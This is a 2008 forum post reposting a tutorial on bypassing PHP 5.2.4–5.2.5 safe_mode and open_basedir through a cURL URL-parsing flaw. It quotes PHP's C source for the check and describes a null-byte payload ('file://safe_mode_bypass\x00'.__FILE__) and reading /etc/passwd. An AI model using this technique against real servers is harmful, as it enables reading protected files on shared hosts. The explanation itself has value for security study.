How To Bypass Safe Mode In Php 5 With Curl

**-=Player=-** · 01.11.2008, 19:48

by desperanto
Achtung: Nicht von mir!

Here is a little tutorial that can help you to bypass SAFE MODE in PHP 5.2.4 - 5.2.5 and maybe ealier..

PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly".

PHP supports libcurl, a library created by Daniel Stenberg, that allows you to connect and communicate to many different types of servers with many different types of protocols. libcurl currently supports the http, https, ftp, gopher, telnet, dict, file, and ldap protocols. libcurl also supports HTTPS certificates, HTTP POST, HTTP PUT, FTP uploading (this can also be done with PHP's ftp extension), HTTP form based upload, proxies, cookies, and user+password authentication.

A vulnerability in PHP's cURL mechanism allows bypassing of the safe_mode mechanism.

Code:

<?php
#define PHP_CURL_CHECK_OPEN_BASEDIR(str, len, __ret);
    if (((PG(open_basedir) && *PG(open_basedir)) || PG(safe_mode)) && strncasecmp(str, "file:", sizeof("file:") - 1) == 0){
        php_url *tmp_url;
        if (!(tmp_url = php_url_parse_ex(str, len))) {
            php_error_docref(NULL TSRMLS_CC, E_WARNING, "Invalid URL '%s'", str);
            php_curl_ret(__ret);
        }
        if (!php_memnstr(str, tmp_url->path, strlen(tmp_url->path), str + len)) {
            php_error_docref(NULL TSRMLS_CC, E_WARNING, "URL '%s' contains unencoded control characters", str);
            php_url_free(tmp_url);
            php_curl_ret(__ret);
        }

        if (tmp_url->query || tmp_url->fragment || php_check_open_basedir(tmp_url->path TSRMLS_CC) ||
            (PG(safe_mode) && !php_checkuid(tmp_url->path, "rb+", CHECKUID_CHECK_MODE_PARAM))){
            php_url_free(tmp_url);
            php_curl_ret(__ret);
        }
        php_url_free(tmp_url);
}
/*
if you have tmp_url = php_url_parse_ex(str, len) where:
str = "file://safe_mode_bypass\x00".__FILE__

and this function will return:
tmp_url->path = __FILE__

curl_init() functions checks safemode and openbasedir for tmp_url->path. Not for real path.
*/
if (argc > 0) {
    char *urlcopy;
    urlcopy = estrndup(Z_STRVAL_PP(url), Z_STRLEN_PP(url));
    curl_easy_setopt(ch->cp, CURLOPT_URL, urlcopy);
    zend_llist_add_element(&ch->to_free.str, &urlcopy);
}
?>

The last step in curl_init() function will only copy file://safe_mode_bypass to urlcopy.

The main problem exists in php_url_parse_ex() function. If you put in curl_init() "file://host/somewhere/path.php", php_url_parse_ex() will select /somewhere/path.php to path variable. Looks good but it cannot be used, when you will check real path. Using file:///etc/passwd is correct but between file:// and /etc/passwd, php_url_parse_ex() will select host and return path to /passwd.

I hope it's useful.. cool.gif
Happy Hacking...

Thema: How To Bypass Safe Mode In Php 5 With Curl

Themen-Optionen

Anzeige

How To Bypass Safe Mode In Php 5 With Curl

Stichworte

Berechtigungen